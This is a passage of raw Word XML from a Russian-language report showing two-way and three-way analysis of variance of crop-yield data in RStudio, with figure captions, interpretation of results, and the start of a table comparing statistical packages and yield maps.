      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="007876D1">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D24085" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="007876D1">
      <w:r>
        <w:t xml:space="preserve">Результат анализа вызывается инструкцией </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>summary</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>two.way</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D020815" w14:textId="464B7BDE" w:rsidR="0093378B" w:rsidRDefault="00BA1029" w:rsidP="007876D1">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00D25175">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30138F50" wp14:editId="7D15BEF3">
            <wp:extent cx="5076825" cy="1371600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4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076825" cy="1371600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FCD855" w14:textId="2BF675D4" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="007876D1">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidR="008F392E">
        <w:t>15</w:t>
      </w:r>
      <w:r w:rsidRPr="007876D1">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:t>результат выполнения двухфакторного дисперсионного анализа</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C041264" w14:textId="5C624B2F" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="007876D1">
      <w:r>
        <w:t xml:space="preserve">В выходной таблице переменная </w:t>
      </w:r>
      <w:r w:rsidRPr="007876D1">
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>fertilizer</w:t>
      </w:r>
      <w:r w:rsidRPr="007876D1">
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>density</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007876D1">
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">имеет низкое значение суммы квадратов отклонений и высокий </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidR="003D2BA6">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>уровень значимости, что означает</w:t>
      </w:r>
      <w:r w:rsidR="003D2BA6">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> что взаимодействие факторов </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>fertilizer</w:t>
      </w:r>
      <w:r w:rsidR="003D2BA6" w:rsidRPr="00D8056C">
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>density</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> не оказывает существенного влияния на результирующую переменную </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>yield</w:t>
      </w:r>
      <w:r>
        <w:t>. Двухфакторный дисперсионный анализ проведён успешно.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6342542D" w14:textId="2C497184" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="007876D1">
      <w:r>
        <w:t>Также для наглядности можно визуализировать данные в виде графиков для наглядности результатов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A437FD" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="006E14B4" w:rsidRDefault="0093378B" w:rsidP="007876D1">
      <w:r>
        <w:t xml:space="preserve">Для построения гистограммы частот используется инструкция </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>hist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71049F20" w14:textId="5C78BC61" w:rsidR="0093378B" w:rsidRDefault="00BA1029" w:rsidP="006E14B4">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00D25175">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="796DB61E" wp14:editId="7A2E4778">
            <wp:extent cx="4162425" cy="2638425"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4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62425" cy="2638425"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="59599400" w14:textId="20F6A67C" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="006E14B4">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidR="008F392E">
        <w:t>16</w:t>
      </w:r>
      <w:r w:rsidRPr="006E14B4">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:t>гистограмма частот данных</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8F9AD7" w14:textId="6B4D033D" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="006E14B4">
      <w:r>
        <w:t xml:space="preserve">На данной гистограмме отображена частота значений переменной </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>yield</w:t>
      </w:r>
      <w:r w:rsidRPr="006E14B4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>из таблицы данных, визуально данные распределены нормально. При оценк</w:t>
      </w:r>
      <w:r w:rsidR="00D8056C">
        <w:t>е</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> дисперсии данных часто используется график </w:t>
      </w:r>
      <w:r w:rsidRPr="006E14B4">
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>ящик с усами</w:t>
      </w:r>
      <w:r w:rsidRPr="006E14B4">
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, данный график есть в языке </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidRPr="006E14B4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">и отображается выполнением инструкции </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>boxplot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3417F4" w14:textId="59D89031" w:rsidR="0093378B" w:rsidRDefault="00BA1029" w:rsidP="006E14B4">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00D25175">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00F096BC" wp14:editId="343B1670">
            <wp:extent cx="4667250" cy="2952750"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4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667250" cy="2952750"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4587AA0E" w14:textId="711DB365" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="006E14B4">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidR="008F392E">
        <w:t>17</w:t>
      </w:r>
      <w:r w:rsidRPr="006E14B4">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:t>«диаграмма ящик с усами» (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>boxplot</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0093C0B1" w14:textId="597B1CBA" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00A35969">
      <w:r>
        <w:t xml:space="preserve">Многофакторный дисперсионный анализ проводится по аналогии с предыдущими примерами, достаточно указать в параметры функции </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>aov</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00A35969">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>интересующие факторы и указа</w:t>
      </w:r>
      <w:r w:rsidR="00D8056C">
        <w:t>ть</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> символами «*» или «+»</w:t>
      </w:r>
      <w:r w:rsidR="00D8056C">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> нужно ли считать взаимодействие факторов или рассматривать их по отдельности. Само понятие </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">взаимодействия факторов достаточно размыто, и всегда необходимо уточнять что под ним подразумевается, потому что в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RStudio</w:t>
      </w:r>
      <w:r w:rsidRPr="00A35969">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">и разнообразных книгах по статистике используются разные определения этого понятия. В </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidRPr="00A35969">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>учитывают взаимодействие факторов</w:t>
      </w:r>
      <w:r w:rsidR="00D8056C">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> когда необходимо рассмотреть такой случай, где независимые друг от друга факторы значительно влияют на переменную отклик вместе, а по отдельности влияние факторов не такое значимое. Например, в приведенном выше примере с урожайностью можно предположить, что плотность посадки влияет на способность растений усваивать удобрения, в таком случае необходимо провести эксперимент со взаимодействием факторов «плотность посадки» и «удобрение», если фактическое </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-значение для взаимодействие факторов больше критического </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r w:rsidRPr="009271BC">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">и в то же время фактические </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-значения факторов «плотность» и «удобрение» меньше критического </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r w:rsidRPr="009271BC">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>то в таком случае следует сделать вывод о том, в реальном поле имеет смысл применять определённое удобрение только при определённой плотности засадки культуры.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F540577" w14:textId="3B894BB7" w:rsidR="0093378B" w:rsidRDefault="00D8056C" w:rsidP="00A35969">
      <w:r>
        <w:t>Для п</w:t>
      </w:r>
      <w:r w:rsidR="0093378B">
        <w:t>роведени</w:t>
      </w:r>
      <w:r>
        <w:t>я</w:t>
      </w:r>
      <w:r w:rsidR="0093378B">
        <w:t xml:space="preserve"> многофакторного дисперсионного анализа (в данном примере присутствуют 3 фактора) необходимо выполнить следующую инструкцию:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156284CB" w14:textId="257700E4" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00DE2A22">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD5112">
        <w:rPr>
          <w:rStyle w:val="23"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>three.way</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD5112">
        <w:rPr>
          <w:rStyle w:val="23"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BD5112">
        <w:rPr>
          <w:rStyle w:val="23"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>aov</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD5112">
        <w:rPr>
          <w:rStyle w:val="23"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BD5112">
        <w:rPr>
          <w:rStyle w:val="23"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">yield ~ fertilizer + density + block, data = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD5112">
        <w:rPr>
          <w:rStyle w:val="23"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>crop.data</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD5112">
        <w:rPr>
          <w:rStyle w:val="23"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00D8056C" w:rsidRPr="00D8056C">
        <w:rPr>
          <w:rStyle w:val="aa"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D8056C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D8056C">
        <w:t>Здесь</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE2A22">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>рассматривается</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE2A22">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>влияние факторов: «</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>fertilizer</w:t>
      </w:r>
      <w:r>
        <w:t>»; «</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>density</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">» </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>и  «</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>block</w:t>
      </w:r>
      <w:r>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE2A22">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">без их взаимодействия. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8D2786" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00DE2A22">
      <w:r>
        <w:t>При исполнении команды вывода результатов анализа можно увидеть, что факторы «</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>fertilizer</w:t>
      </w:r>
      <w:r>
        <w:t>» и «</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>density</w:t>
      </w:r>
      <w:r>
        <w:t>» имеют статистически значимое влияние на переменную-отклик «</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>yield</w:t>
      </w:r>
      <w:r>
        <w:t>», а фактор «</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>block</w:t>
      </w:r>
      <w:r>
        <w:t>» не имеет.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65324054" w14:textId="53A1C3FB" w:rsidR="0093378B" w:rsidRDefault="00BA1029" w:rsidP="00DE2A22">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00D25175">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28D36B43" wp14:editId="1521FADE">
            <wp:extent cx="5257800" cy="1343025"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="50"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57800" cy="1343025"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="53DAD212" w14:textId="2A1CDDF2" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00DE2A22">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidR="008F392E">
        <w:t>18</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – результаты проведения многофакторного (трёхфакторного) дисперсионного анализа</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB9EA8A" w14:textId="2129A3E4" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00DE2A22">
      <w:r>
        <w:t xml:space="preserve">Многофакторный дисперсионный анализ в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RStudio</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE2A22">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>проведён успешно.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5EB8CF" w14:textId="04A25138" w:rsidR="008F392E" w:rsidRDefault="00A86ECB" w:rsidP="005A31AD">
      <w:r>
        <w:t xml:space="preserve">Таким образом агроном может исследовать влияние различных факторов на агроэкосистему на основании собранных данных наблюдений. Такого сорта исследования очень полезны именно </w:t>
      </w:r>
      <w:r w:rsidR="00D8056C">
        <w:t xml:space="preserve">тогда, </w:t>
      </w:r>
      <w:r>
        <w:t>когда опыты проводятся на основании реальных</w:t>
      </w:r>
      <w:r w:rsidR="00D8056C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>достоверных, полученных «прямиком с полей»</w:t>
      </w:r>
      <w:r w:rsidR="00D8056C">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> данных</w:t>
      </w:r>
      <w:r w:rsidR="00D8056C">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D8056C">
        <w:t xml:space="preserve">Тогда </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">после расчёта отношения Фишера и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-уровня значимости исследователь имеет чёткое представление о том, какой именно фактор влияет на </w:t>
      </w:r>
      <w:r w:rsidR="00BE2C8A">
        <w:t>исследуемую величину.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B2586C" w14:textId="77777777" w:rsidR="008778F0" w:rsidRDefault="008778F0" w:rsidP="008778F0">
      <w:r>
        <w:t>Также стоит отметить, что основной мотивацией постановки задачи заказчиком на разработку веб-портала для агрономов является некоторые недостатки как статистических пакетов и «карт урожая». Эти проблемы рассмотрены в таблице 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F6FF59" w14:textId="77777777" w:rsidR="008778F0" w:rsidRPr="00823137" w:rsidRDefault="008778F0" w:rsidP="008778F0">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00541C36">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Таблица 1 – </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Сравнительная характеристика статистических пакетов и «карт урожая»</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0"/>
        <w:gridCol w:w="1529"/>
        <w:gridCol w:w="2028"/>
        <w:gridCol w:w="1202"/>
        <w:gridCol w:w="1441"/>
        <w:gridCol w:w="1566"/>
      </w:tblGrid>
      <w:tr w:rsidR="008778F0" w:rsidRPr="0066369B" w14:paraId="2638F166" w14:textId="77777777" w:rsidTr="0038557A">
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="339"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1590" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="72AEEA8C" w14:textId="77777777" w:rsidR="008778F0" w:rsidRPr="0066369B" w:rsidRDefault="008778F0" w:rsidP="0038557A">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Название системы</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1529" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3B68E84F" w14:textId="77777777" w:rsidR="008778F0" w:rsidRDefault="008778F0" w:rsidP="0038557A">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Доступность</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42A4E475" w14:textId="77777777" w:rsidR="008778F0" w:rsidRPr="0066369B" w:rsidRDefault="008778F0" w:rsidP="0038557A">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>в России</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1567" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4ADD3A77" w14:textId="77777777" w:rsidR="008778F0" w:rsidRPr="0066369B" w:rsidRDefault="008778F0" w:rsidP="0038557A">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Кросс-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>платформенность</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1227" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2418B888" w14:textId="77777777" w:rsidR="008778F0" w:rsidRDefault="008778F0" w:rsidP="0038557A">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
